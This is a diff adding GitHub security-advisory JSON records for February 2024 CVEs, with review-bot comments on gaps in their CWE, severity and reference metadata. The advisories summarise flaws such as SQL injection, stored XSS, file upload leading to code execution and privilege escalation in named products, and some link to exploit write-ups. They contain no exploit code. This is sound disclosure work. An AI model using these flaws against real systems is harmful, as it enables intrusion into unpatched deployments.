+++ b/advisories/unreviewed/2024/02/GHSA-crrf-qhw3-5g49/GHSA-crrf-qhw3-5g49.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-crrf-qhw3-5g49",
+ "modified": "2024-02-02T09:30:21Z",
+ "published": "2024-02-02T09:30:21Z",
+ "aliases": [
+ "CVE-2024-21780"
+ ],
+ "details": "Stack-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. Processing a specially crafted command may result in a denial of service (DoS) condition. Note that the affected products are no longer supported.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21780"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jvn.jp/en/vu/JVNVU93740658/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T07:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cvgq-qqv7-prrh/GHSA-cvgq-qqv7-prrh.json b/advisories/unreviewed/2024/02/GHSA-cvgq-qqv7-prrh/GHSA-cvgq-qqv7-prrh.json
new file mode 100644
index 0000000000000..cd6f218cb0554
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cvgq-qqv7-prrh/GHSA-cvgq-qqv7-prrh.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cvgq-qqv7-prrh",
+ "modified": "2024-02-02T21:31:29Z",
+ "published": "2024-02-02T21:31:29Z",
+ "aliases": [
+ "CVE-2024-1194"
+ ],
+ "details": "A vulnerability classified as problematic has been found in Armcode AlienIP 2.41. Affected is an unknown function of the component Locate Host Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1194"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fitoxs.com/vuldb/25-exploit-perl.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252684"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252684"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cvpw-2w45-gm65/GHSA-cvpw-2w45-gm65.json b/advisories/unreviewed/2024/02/GHSA-cvpw-2w45-gm65/GHSA-cvpw-2w45-gm65.json
new file mode 100644
index 0000000000000..37223518b5e4a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cvpw-2w45-gm65/GHSA-cvpw-2w45-gm65.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cvpw-2w45-gm65",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24861"
+ ],
+ "details": "A race condition was found in the Linux kernel's media/xc4000 device driver in xc4000 xc4000_get_frequency() function. This can result in return value overflow issue, possibly leading to malfunction or denial of service issue.\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24861"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8150"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-362"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T08:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cw37-799x-r3xf/GHSA-cw37-799x-r3xf.json b/advisories/unreviewed/2024/02/GHSA-cw37-799x-r3xf/GHSA-cw37-799x-r3xf.json
new file mode 100644
index 0000000000000..538a9ca1b4a5c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cw37-799x-r3xf/GHSA-cw37-799x-r3xf.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cw37-799x-r3xf",
+ "modified": "2024-02-07T00:30:26Z",
+ "published": "2024-02-07T00:30:26Z",
+ "aliases": [
+ "CVE-2024-24001"
+ ],
+ "details": "jshERP v3.3 is vulnerable to SQL Injection. via the com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findallocationDetail() function of jshERP which allows an attacker to construct malicious payload to bypass jshERP's protection mechanism.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24001"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jishenghua/jshERP/issues/99"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24001.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T00:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cxgx-xggq-rg7w/GHSA-cxgx-xggq-rg7w.json b/advisories/unreviewed/2024/02/GHSA-cxgx-xggq-rg7w/GHSA-cxgx-xggq-rg7w.json
new file mode 100644
index 0000000000000..01d2ad6cf864b
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cxgx-xggq-rg7w/GHSA-cxgx-xggq-rg7w.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cxgx-xggq-rg7w",
+ "modified": "2024-02-08T21:30:38Z",
+ "published": "2024-02-08T21:30:38Z",
+ "aliases": [
+ "CVE-2024-22795"
+ ],
+ "details": "Insecure Permissions vulnerability in Forescout SecureConnector v.11.3.06.0063 allows a local attacker to escalate privileges via the Recheck Compliance Status component.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22795"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/Hagrid29/aea0dc35a1e87813dbbb7b317853d023"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Hagrid29/ForeScout-SecureConnector-EoP"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.forescout.com/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cxwq-x5m7-2p4v/GHSA-cxwq-x5m7-2p4v.json b/advisories/unreviewed/2024/02/GHSA-cxwq-x5m7-2p4v/GHSA-cxwq-x5m7-2p4v.json
new file mode 100644
index 0000000000000..2b220e912c120
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cxwq-x5m7-2p4v/GHSA-cxwq-x5m7-2p4v.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cxwq-x5m7-2p4v",
+ "modified": "2024-02-02T00:31:27Z",
+ "published": "2024-02-02T00:31:27Z",
+ "aliases": [
+ "CVE-2023-6221"
+ ],
+ "details": "\nThe cloud provider MachineSense uses for integration and deployment for multiple MachineSense devices, such as the programmable logic controller (PLC), PumpSense, PowerAnalyzer, FeverWarn, and others is insufficiently protected against unauthorized access. An attacker with access to the internal procedures could view source code, secret credentials, and more.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6221"
+ },
+ {
+ "type": "WEB",
+ "url": "https://machinesense.com/pages/about-machinesense"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-306"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T23:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-f4w8-52pm-ghr9/GHSA-f4w8-52pm-ghr9.json b/advisories/unreviewed/2024/02/GHSA-f4w8-52pm-ghr9/GHSA-f4w8-52pm-ghr9.json
new file mode 100644
index 0000000000000..68289989523b5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-f4w8-52pm-ghr9/GHSA-f4w8-52pm-ghr9.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f4w8-52pm-ghr9",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-50940"
+ ],
+ "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information as the domain name is not being limited to only trusted domains. IBM X-Force ID: 275130.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50940"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275130"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7113759"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-697",
+ "CWE-942"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-f527-jggh-c37w/GHSA-f527-jggh-c37w.json b/advisories/unreviewed/2024/02/GHSA-f527-jggh-c37w/GHSA-f527-jggh-c37w.json
new file mode 100644
index 0000000000000..dd5e4632ab55c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-f527-jggh-c37w/GHSA-f527-jggh-c37w.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f527-jggh-c37w",
+ "modified": "2024-02-02T06:30:32Z",
+ "published": "2024-02-02T06:30:32Z",
+ "aliases": [
+ "CVE-2024-1047"
+ ],
+ "details": "The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the register_reference() function in all versions up to, and including, 2.10.28. This makes it possible for unauthenticated attackers to update the connected API keys.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1047"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php#L175"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3029507/themeisle-companion/tags/2.10.29/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6147582f-578a-47ad-b16c-65c37896783d?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T06:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json b/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json
new file mode 100644
index 0000000000000..c776219561166
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f5c4-v2h9-f7mq",
+ "modified": "2024-02-06T21:30:26Z",
+ "published": "2024-02-06T21:30:26Z",
+ "aliases": [
+ "CVE-2024-22239"
+ ],
+ "details": "Aria Operations for Networks contains a local privilege escalation vulnerability. A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain regular shell access. ",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22239"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T20:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-f5rg-254c-x94v/GHSA-f5rg-254c-x94v.json b/advisories/unreviewed/2024/02/GHSA-f5rg-254c-x94v/GHSA-f5rg-254c-x94v.json
new file mode 100644
index 0000000000000..c332d9ee335df
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-f5rg-254c-x94v/GHSA-f5rg-254c-x94v.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f5rg-254c-x94v",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2024-24254"
+ ],
+ "details": "PX4 Autopilot 1.14 and earlier, due to the lack of synchronization mechanism for loading geofence data, has a Race Condition vulnerability in the geofence.cpp and mission_feasibility_checker.cpp. This will result in the drone uploading overlapping geofences and mission routes.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24254"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Drone-Lab/PX4-Autopilot/blob/report-can-not-pause-vulnerability/Multi-Threaded%20Race%20Condition%20bug%20found%20in%20PX4%20cause%20drone%20can%20not%20PAUSE.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/PX4/PX4-Autopilot"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T22:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-f7cf-fr2r-2cwx/GHSA-f7cf-fr2r-2cwx.json b/advisories/unreviewed/2024/02/GHSA-f7cf-fr2r-2cwx/GHSA-f7cf-fr2r-2cwx.json
new file mode 100644
index 0000000000000..a44f7434d5317
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-f7cf-fr2r-2cwx/GHSA-f7cf-fr2r-2cwx.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f7cf-fr2r-2cwx",
+ "modified": "2024-02-07T15:30:49Z",
+ "published": "2024-02-07T15:30:49Z",
+ "aliases": [
+ "CVE-2024-25201"
+ ],
+ "details": "Espruino 2v20 (commit fcc9ba4) was discovered to contain an Out-of-bounds Read via jsvStringIteratorPrintfCallback at src/jsvar.c.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25201"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/espruino/Espruino/issues/2456"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T14:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-f7f8-8qv6-p289/GHSA-f7f8-8qv6-p289.json b/advisories/unreviewed/2024/02/GHSA-f7f8-8qv6-p289/GHSA-f7f8-8qv6-p289.json
new file mode 100644
index 0000000000000..c42e9a7e7e647
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-f7f8-8qv6-p289/GHSA-f7f8-8qv6-p289.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f7f8-8qv6-p289",
+ "modified": "2024-02-06T15:32:08Z",
+ "published": "2024-02-06T15:32:08Z",
+ "aliases": [
+ "CVE-2024-24594"
+ ],
+ "details": "A cross-site scripting (XSS) vulnerability in all versions of the web server component of Allegro AI’s ClearML platform allows a remote attacker to execute a JavaScript payload when a user views the Debug Samples tab in the web UI.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24594"
+ },
+ {
+ "type": "WEB",
+ "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T15:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-f86q-9xmw-hpfx/GHSA-f86q-9xmw-hpfx.json b/advisories/unreviewed/2024/02/GHSA-f86q-9xmw-hpfx/GHSA-f86q-9xmw-hpfx.json
new file mode 100644
index 0000000000000..1f40d6b9a11ca
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-f86q-9xmw-hpfx/GHSA-f86q-9xmw-hpfx.json
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f86q-9xmw-hpfx", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24498" + ], + "details": "Unrestricted File Upload vulnerability in Employee Management System 1.0 allows a remote attacker to execute arbitrary code via the edit-photo.php component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24498" + }, + { + "type": "WEB", + "url": "https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-Unauthenticated_Unrestricted_File_Upload_To_RCE.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fc5m-43m8-862c/GHSA-fc5m-43m8-862c.json b/advisories/unreviewed/2024/02/GHSA-fc5m-43m8-862c/GHSA-fc5m-43m8-862c.json new file mode 100644 index 0000000000000..44bbae4c0a08c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fc5m-43m8-862c/GHSA-fc5m-43m8-862c.json 
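Review bot: The `details` text omits that the upload is reachable without authentication, which the only technical reference states in its own title (`…-Unauthenticated_Unrestricted_File_Upload_To_RCE.md`); if the write-up supports it, `details` should say "allows an unauthenticated remote attacker", since that is the difference between a moderate and a critical finding. `cwe_ids` is empty although the description names the weakness class directly — `"cwe_ids": ["CWE-434"]` is the standard mapping for unrestricted upload. With no vector and a null `severity`, consumers sorting by severity will never surface this entry.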
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fc5m-43m8-862c", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6982" + ], + "details": "The Display custom fields in the frontend – Post and User Profile Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and postmeta in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6982" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3077b84e-87af-4307-83c5-0e4b15d07ff1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fcj4-pm86-7gjw/GHSA-fcj4-pm86-7gjw.json b/advisories/unreviewed/2024/02/GHSA-fcj4-pm86-7gjw/GHSA-fcj4-pm86-7gjw.json new file mode 100644 index 0000000000000..66c4890951235 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fcj4-pm86-7gjw/GHSA-fcj4-pm86-7gjw.json 
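Review bot: The `plugins.trac.wordpress.org/changeset?…` reference compares revision `3021133` against itself (`old=3021133…&new=3021133…`), so the link renders an empty diff and does not show the fix; the usable form is `https://plugins.trac.wordpress.org/changeset/3021133/shortcode-to-display-post-and-user-data`, assuming 3021133 is indeed the fixing revision. `cwe_ids` is empty for an explicitly described Stored XSS, where `"cwe_ids": ["CWE-79"]` is the standard mapping. The MODERATE severity matches the 6.4 vector, so that part of the record is consistent.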
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fcj4-pm86-7gjw", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-1150" + ], + "details": "Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on Unix allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 7.3.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1150" + }, + { + "type": "WEB", + "url": "https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-347" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-ff78-2q7q-3gpw/GHSA-ff78-2q7q-3gpw.json b/advisories/unreviewed/2024/02/GHSA-ff78-2q7q-3gpw/GHSA-ff78-2q7q-3gpw.json new file mode 100644 index 0000000000000..616e69b324cf8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-ff78-2q7q-3gpw/GHSA-ff78-2q7q-3gpw.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ff78-2q7q-3gpw", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-22817" + ], + "details": "Server-side request forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL using another DNS address to point back to the loopback adapter. This could then allow the URL to exploit other vulnerabilities on the local server. This was addressed by fixing DNS addresses that refer to loopback. This issue affects My Cloud OS 5 devices before 5.27.161, My Cloud Home, My Cloud Home Duo and SanDisk ibi devices before 9.5.1-104. \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22817" + }, + { + "type": "WEB", + "url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fg4q-4pq7-35p9/GHSA-fg4q-4pq7-35p9.json b/advisories/unreviewed/2024/02/GHSA-fg4q-4pq7-35p9/GHSA-fg4q-4pq7-35p9.json new file mode 100644 index 0000000000000..2056fbe2464bf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fg4q-4pq7-35p9/GHSA-fg4q-4pq7-35p9.json 
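Review bot: The vector's `AV:L` does not match the `details` text, which places the attacker as "a rogue server on the local network" — that is adjacent-network reach, `AV:A` in CVSS 3.1, not local access. The score only shifts from 5.5 to 5.7 (`CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N`) and stays MODERATE, but `AV:L` will mislead anyone filtering for network-reachable issues. The vector is the vendor's, so flag it for correction upstream. The `details` string also ends in a trailing space plus `\n` that renders as a blank line.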
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fg4q-4pq7-35p9", + "modified": "2024-02-02T12:30:30Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2023-51072" + ], + "details": "A stored cross-site scripting (XSS) vulnerability in the NOC component of Nagios XI version up to and including 2024R1 allows low-privileged users to execute malicious HTML or JavaScript code via the audio file upload functionality from the Operation Center section. This allows any authenticated user to execute arbitrary JavaScript code on behalf of other users, including the administrators.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51072" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/products/security/#nagios-xi" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fgv7-7rh4-3353/GHSA-fgv7-7rh4-3353.json b/advisories/unreviewed/2024/02/GHSA-fgv7-7rh4-3353/GHSA-fgv7-7rh4-3353.json new file mode 100644 index 0000000000000..792ce1a410b90 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fgv7-7rh4-3353/GHSA-fgv7-7rh4-3353.json 
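Review bot: The only non-NVD reference is the vendor's general product-security landing page (`https://www.nagios.com/products/security/#nagios-xi`), which lists every Nagios XI issue and will not stay pinned to this one; if Nagios publishes a changelog entry for the fixing release, that link is the one to keep. `cwe_ids` is empty although `details` explicitly describes stored XSS via an audio upload, for which `"cwe_ids": ["CWE-79"]` applies. The description gives only "up to and including 2024R1" with no fixed version, so `affected` cannot be filled from the record alone.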
